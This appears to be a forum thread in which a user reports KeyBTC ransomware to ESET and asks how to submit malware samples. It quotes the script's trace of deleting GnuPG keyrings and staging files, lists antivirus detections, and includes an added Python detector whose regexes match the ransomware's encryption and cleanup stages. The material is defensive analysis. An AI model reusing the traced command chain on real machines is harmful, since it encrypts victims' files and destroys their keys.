    C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\ltr*.html"
    C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\pubring.gpg"
    C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\secring.gpg"
    C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\trustdb.gpg"
    C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\random_seed"
    C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\crypta.bin"
    C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\*.lock"
    C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\*.btc"
    C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\*.html"
    C:\Users\%UserName%\AppData\Local\Temp>del /f /q keybtc.cmd

    Remark: start hxxp://bit.ly/keybtc - hxxp://en.wikipedia.org/wiki/RSA_(cryptosystem)#Key_generation. Why does it open this Wikipedia page?

     

    Information above from @Malwarehunter (malwaretips.com)

     

    Can you explain why, 3 days after I sent the file,

    keybtc.btc is still undetected?

     

    https://www.virustotal.com/it/file/37c73b3d6ba7d96cbf387f4436f6a2262af14b84f9c0a218fde1b28db5edd23f/analysis/

     

    AVG Generic11_c.QPE 20140808

    Avast Other:Malware-gen [Trj] 20140807

    DrWeb BAT.Encoder.23 20140808

    Emsisoft Trojan-Ransom.BAT.Agent (A) 20140808

    GData Script.Trojan-Ransom.Scatter.A 20140808

    Kaspersky Trojan-Ransom.BAT.Scatter.s 20140808

    Microsoft Ransom:BAT/Xibow.A 20140808

    Symantec Trojan Horse 20140808

    Tencent Bat.Trojan.Scatter.Lnes 20140808

    ESET=??????

    For all the files sent to you I gave you the source link to download.

     

    When will the ESET Malware Response Team add detection?

    Why does the ESET Malware Response Team not block the download of *.btc files and only block the *.zip file from collapseit.com?

    Why, for 3 days, has the ESET Malware Response Team not answered my mail?

     

    Thanks
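    Added example, written for this page and not code from the forum post, from ESET or from the malware: a rule-based check that flags the behaviour chain the trace above shows (JScript downloader, GnuPG key request built with echo redirects, an echoed PGP public key block, GnuPG renamed to svchost.exe and run from %TEMP% with --encrypt-files and --trust-model always, *.btc payloads renamed into tools, keyring cleanup) when several of those stages, or a system-binary name running from outside the Windows directory, appear in command-line records. The trace lines, the user name bob, the rule names and the stage threshold are constructed for this example.

```python
import re
from collections import Counter

# One regex per stage of the KeyBTC chain shown in the trace above. Names and
# patterns are this example's own, not ESET's or any vendor's signatures.
STAGE_RULES = {
    "js_downloader": re.compile(r"(?i)\bw?script\.exe\b.*\\users\\.*\.js\b"),
    "gpg_key_request": re.compile(r"(?i)\becho\s+Key-(Type|Length|Real)\b.*>>?\s*\S+"),
    "pgp_key_block": re.compile(r"(?i)\becho\s+-----BEGIN PGP PUBLIC KEY BLOCK-----"),
    "gpg_encrypt_files": re.compile(r"(?i)\\temp\\[^\\\s\"]+\.exe\"?.*--encrypt-files\b"),
    "trust_model_always": re.compile(r"(?i)--trust-model\s+always\b"),
    "btc_staging": re.compile(r"(?i)\b(rename|copy)\b.*\.btc\b"),
    "spam_mailer": re.compile(r"(?i)\\temp\\spoolsv\.exe\b.*-server\s+\S+.*\s-to\s"),
    "keyring_cleanup": re.compile(
        r"(?i)\b(del|rmdir)\b.*(secring\.gpg|pubring\.gpg|\\gnupg\b|sdelete\.exe)"),
}

# System binary names the dropper reuses for its renamed payloads.
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "spoolsv.exe"}
SYSTEM_DIR = re.compile(r"(?i)^[a-z]:\\windows\\(system32|syswow64)\\")
PROMPT = re.compile(r"^[A-Za-z]:\\[^>]*>")  # 'C:\...\Temp>' prefix of an echoed trace


def normalize(line):
    """Strip a cmd.exe prompt prefix so trace lines and event logs look alike."""
    return PROMPT.sub("", line.strip(), count=1)


def leading_image(line):
    """First token of a command line, without surrounding quotes."""
    line = normalize(line)
    if line.startswith('"'):
        return line[1:line.find('"', 1)]
    return line.split(None, 1)[0] if line else ""


def masquerading_image(image):
    """True when a Windows system binary name runs from outside the system dir."""
    name = image.rsplit("\\", 1)[-1].lower()
    return name in SYSTEM_NAMES and SYSTEM_DIR.match(image) is None


def classify_line(line):
    """Names of the stages whose pattern matches this command line."""
    text = normalize(line)
    return [stage for stage, rx in STAGE_RULES.items() if rx.search(text)]


def assess(lines, min_stages=3):
    """Count distinct stages over a trace; several stages, or a masquerading
    binary doing the GnuPG encryption, is reported as KeyBTC-like."""
    stages = Counter()
    masquerading = []
    for line in lines:
        stages.update(classify_line(line))
        image = leading_image(line)
        if masquerading_image(image):
            masquerading.append(image)
    hit = len(stages) >= min_stages or (masquerading and "gpg_encrypt_files" in stages)
    return {"stages": dict(stages), "masquerading": masquerading, "keybtc_like": bool(hit)}


# Constructed trace modelled on the keybtc.cmd output above (not a real log).
SAMPLE_TRACE = [
    r'wscript.exe "C:\Users\bob\Downloads\invoice2014.js"',
    r'C:\Users\bob\AppData\Local\Temp>echo Key-Type: RSA 1>genrsa.btc',
    r'C:\Users\bob\AppData\Local\Temp>echo Key-Length: 1024 1>>genrsa.btc',
    r'C:\Users\bob\AppData\Local\Temp>echo -----BEGIN PGP PUBLIC KEY BLOCK----- 1>2048key.btc',
    r'"C:\Users\bob\AppData\Local\Temp\svchost.exe" -r keybtc --yes --trust-model always '
    r'--no-verbose -q --encrypt-files "C:\Users\bob\AppData\Local\Temp\secring.gpg"',
    r'C:\Users\bob\AppData\Local\Temp>RENAME spool.btc blat.lib',
    r'C:\Users\bob\AppData\Local\Temp>del /f /q "C:\Users\bob\AppData\Roaming\gnupg\*.*"',
    r'C:\Windows\System32\svchost.exe -k netsvcs',
]
# Constructed benign lines: the real svchost and a legitimate gpg invocation.
BENIGN_TRACE = [
    r'C:\Windows\System32\svchost.exe -k netsvcs',
    r'"C:\Program Files\GnuPG\bin\gpg.exe" --encrypt -r alice report.pdf',
]

if __name__ == "__main__":
    print(assess(SAMPLE_TRACE))
    print(assess(BENIGN_TRACE))
```

The prompt stripping is a simplification for echoed batch traces; a process-creation feed would give the image path as its own field and not need it.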

  4. I have sent a mail with attached files and a screenshot.

     

    I have the last 144 files triple-checked with Emsisoft, Kaspersky, Bitdefender (only trojans and backdoors, no corrupt files, and not detected by ESET Smart Security 7).

    Can you please tell me if I can send a mail with a screenshot and a link to download? Or do you prefer 10-20 samples attached at a time?

     

     

    Thank You

     

    Regards

    Luigi

  5. Hi

    I write here to ask:

     

    I have sent mail to samples@eset.com to ask how to submit a large collection of malware.

    The ESET Malware Response Team answered me to send samples to check the quality.

    I sent them but I did not receive an answer.

     

    I have sent mail to samples@eset.com with some malware samples, but not attached because they are too large, and I posted a link with a request to alert me if they don't accept it.

    I did not receive an answer.

     

    I have Eset Smart Security 7 with 5 licenses

     

    I wrote to support@eset.com but they told me to write to samples@eset.com.

     

    How can I get feedback and an answer?

     

    Thank You

    Regards

    Luigi
